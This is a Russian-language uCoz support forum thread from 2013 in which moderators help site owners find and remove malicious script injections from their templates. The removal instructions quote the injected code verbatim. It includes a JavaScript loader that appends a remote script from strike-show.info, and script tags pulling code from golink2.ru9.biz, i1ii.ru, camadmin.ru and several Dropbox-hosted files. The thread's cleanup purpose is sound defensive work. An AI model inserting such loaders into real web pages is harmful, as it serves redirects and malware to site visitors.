Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Деееенчик, учитесь работать со скриптами и исходниками. во второй части вы выложили содержимое скриптов. вот как раз эти результаты пользователь никогда не найдет в коде.
читайте тему. тут уже сто раз висят образцы как чистить сайт именно под этими симптомами zuzikisa, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить по очереди вставляете скрипты Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script> Код <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script> поле на что заменить оставляете пустым и производите замену во всех модулях. после очистки нужно сменить пароль uID профиля. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1 если не в первый раз, то читайте это сообщение //forum.ucoz.ru/forum/45-34556-15#1050949 |
|
webanet, например вот
 При нажатии на пункте меню "Объявления" выскочил сей левый сайт. Проблема точно не в компьютере, т.к. такая же ситуация на других провайдерах/компьютерах. Периодичность открытия левой ссылки непонятна. То сразу же, то раза с 20-го. Сайты выскакивают разные. |
|
LUK, удалите код
Код script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ywqguhtyoiug. strike-show.info' + '/?137698=lt-WkMSAjo2BiYuGkd_T0tPa09I'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); |
|
LUK, из шаблона нижняя часть сайт нужно удалить код
Код <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ywqguhtyoiug.strike-show.info' + '/?137698=lt-WkMSAjo2BiYuGkd_T0tPa09I'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> |
|
Цитата (Деееенчик) Это удалите с помощью быстрой замены Добавлено (31 Июл 2013, 16:41:26) --------------------------------------------- webanet, окольным путем попала в панель управления, но на главнорй пропало меню. Добавлено (31 Июл 2013, 17:03:46) --------------------------------------------- CТРАННО, что сервер ukoz не в состоянии оградить своих клиентов от хаккеров.....ведь, в отличие от борды доменноЕ имя оплачивалось...! ВЫ ГДЕ НИБУДЬ НА БОРДЕ ВИДЕЛИ ТАКОЕ БЕЗОБРАЗИЕ, ЧТОБЫ ВЛАДЕЛЕЦ ФОРУМА , КАЖДЫЕ ДВЕ НЕДЕЛИ НАБЛЮДАЛ НА ФОРУМЕ ВИРУСЫ И ПОРНО ССЫЛКИ? и не надо списыватЬ НА СЛИТЫЙ ПАРОЛЬ! ПОЧЕМУ НА БОРДЕ ВЕСЬ СЕРВАК НЕ ДОХНЕТ И ОНИ РАЗБИРАЮТСЯ СО СВОИМИ ПРОБЛЕМАМИ САМИ? Я ВАШИМИ УСЛУГАМИ ПОЛЬЗУЮСЬ не БЕСПЛАТНО! почему я должна каждые две недели мучатся наблюдая это порнО НА СВОЁМ САЙТЕ? СКАЖИТЕ КАК УДАЛИТЬ САЙТ С ВАШЕГО СЕРВЕРА И ИДИТЕ К ЧЕРТУ! какого чёрта каждые две недели я должна чистить сайт и какого чёрта он не отображает МЕНЮ ? http://hrithikroshan-best.ru/ я что для этих ваших рекламщиков оплачивала доменное имя на пять лет??????? если у вас ноль безопасности и ноль того, что вы сами разбираетесь со своим серваком, зачем вообще вы нужны? борду никто не хаккерит, СЛИТЫЕ ТАМ ПАРОЛИ ИЛИ ОТЛИТЫЕ, У МЕНЯ НА БОРДЕ ФОРУМ И МЕНЯ ТАМ НИКТО КАЖДЫЕ 2 НЕДЕЛИ НЕ ПОСЫЛАЕТ В НАСТРОЙКИ! ПОЧЕМУ ТОЛЬКО У ВАС ТАКОЕ БЕЗОБРАЗИЕ? Сообщение отредактировал zuzikisa - Среда, 31 Июл 2013, 17:14:45
|
|
zuzikisa, вы безответственно относитесь к безопасности. У вас очень простой пароль от вашего uID профиля и безобразие это по вашей вине. Проблем в безопасности сервиса uCoz нет.
|
|
Цитата (Vladimir$) zuzikisa, вы безответственно относитесь к безопасности. У вас очень простой пароль от вашего uID профиля и безобразие это по вашей вине. Проблем в безопасности сервиса uCoz нет. |
|
zuzikisa, вы можете предпринять ряд важных действий для защиты своих данных на любом сайте, включая www.ucoz.ru:
избегайте использовать простые пароли из обычных слов; создавайте сложные пароли, которые нельзя подобрать (пример - kDi3p9S). Минимальная длина пароля - 6 символов, максимальная - 15. Пароль чувствителен к регистру, что означает, что пароли "Password6" и "password6" будут восприниматься как разные. никогда не используйте один пароль на нескольких сайтах или сервисах; никогда не нажимайте на ссылки для сброса паролей в электронных письмах — перейдите для этого на сайт сервиса. Рекомендую вам подходить изобретательно к созданию нового пароля и регулярно менять его, чтобы избежать проникновения посторонних лиц в ваш аккаунт. Также вам нужно ознакомится с темами форума: //u.to/WlMKAQ //u.to/cFMKAQ |
|
Здравствуйте. Помогите разобраться с проблемой на сайте http://school5classv.ucoz.ru/ Некоторые страницы очень медленно открываются, и при этом в браузере Google Chrome в нижнем левом углу появляется надпись "Ожидание golink2.ru9.biz..."
Появляется только на этих страницах http://school5classv.ucoz.ru/gb http://school5classv.ucoz.ru/ http://school5classv.ucoz.ru/index/0-2 http://school5classv.ucoz.ru/index/blagodarim/0-10 http://school5classv.ucoz.ru/index/nash_klass/0-8 http://school5classv.ucoz.ru/index/nasha_uchitelnica/0-4 При гостевом входе тоже. Антивирус AVG не реагирует. Спасибо. Ждала.... Разобралась сама. Но не до конца. На данной странице http://school5classv.ucoz.ru/load/0-0-1-0-17 где-то остался skript golink2.ru9.biz... , но найти не могу. Сообщение отредактировал 4ajka - Пятница, 02 Авг 2013, 00:56:26
|
|
4ajka, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставьте скрипт
Код <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script> поле на что заменить оставьте пустым и произведите замену во всех модулях или откройте шаблон поиска и рейтинга материала каталога файлов и удалите указанный скрипт из верхней части кода |
|
zuzikisa, мне пофиг на админов, но в данном случае, вы не правы. Нечего на зеркало пенять, коль рожа крива. Если у вас все сделано через одно место, то чего жаловаться, что каждый школьник ломает ваши сайты. На Юкозе есть действительно хорошие сайты, и если подойти с умом, можно особо не напрягаясь сделать сайт, который будет нравиться и людям, и приносить доход. Закажите себе независимый аудит безопасности, а там посмотрим, кто прав.
|
|
Всем привет друзья прошу вашу помощь у меня на сайт появились вирусы не знаю почему проверил сайт на 2ip.ru и вот что показывает мне (скрин) хотел зайти на сайт через яндекс браузер тоже выдал вирус (скрин) проблема иза iframe-вставок помогите удалить их пажалуйста прошу вас вроде никакой рекламы на сайте нет +запретил бб коды во всех группах кроме админ и HTML теги кроме админа .... Заранее Спасибо .. сайт - chelseatv.ru
  Прикрепления:
7933213.jpg
(108.8 Kb)
·
0864554.jpg
(108.5 Kb)
www.chelseatv.ru - сайт для фанатов челси !
Сообщение отредактировал Vaniuska - Воскресенье, 04 Авг 2013, 14:44:53
|
|
Vaniuska, на счет 2ipюкг читаем тут //forum.ucoz.ru/forum/45-47668-1
далее чистим сайт из формы входа удаляем скрипт Код <script src="http://i1ii.ru/1.js" type="text/javascript"></script> из крутого кода нас посетили удаляем скрипт Код <script type="text/javascript" src="http://camadmin.ru/earch.js"></script> из вида материалов новостей удаляем лишнее битое и спам Цитата <style> /*??? ?????????? by Rip-uCoz.Ru*/ .fon_table {font-size:12pt; background: url(http://rip-ucoz.ru/LESSEON/bg1.jpg) repeat scroll 0% 0% transparent; border:1px solid #cccccc; padding-top:4px;padding-bottom:4px;padding-left:2px; } .title {color:#b42828; text-shadow:1px 1px 0px #fff; font-size:16px;font-weight:bold;text-decoration:none;} .title a {color:#b42828; text-shadow:1px 1px 0px #fff; font-size:16px;font-weight:bold;text-decoration:none;} .title a:hover {color:#b42828; text-shadow:1px 1px 0px #fff; font-size:16px;font-weight:bold;text-decoration:underline;} .poster {background: #fafafa; border:1px solid #cccccc;padding:4px;} .cont {background: #fafafa; border:1px solid #cccccc;padding:4px;text-shadow:1px 1px 0px #fff;} .det {background: #fafafa; border:1px solid #cccccc;padding:4px;text-shadow:1px 1px 0px #fff; color:#777777; font-size:13px;} /*??? ?????????? by Rip-uCoz.Ru*/ </style> быстро возвращаем копирайт на место. на данный момент копирайт вынесен за пределы хтмл и скрыт методом <noscript> копирайт должен находится в футере и лучше не использовать рипы шаблонов. рипы всегда дороже обходятся во всех смыслах |
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!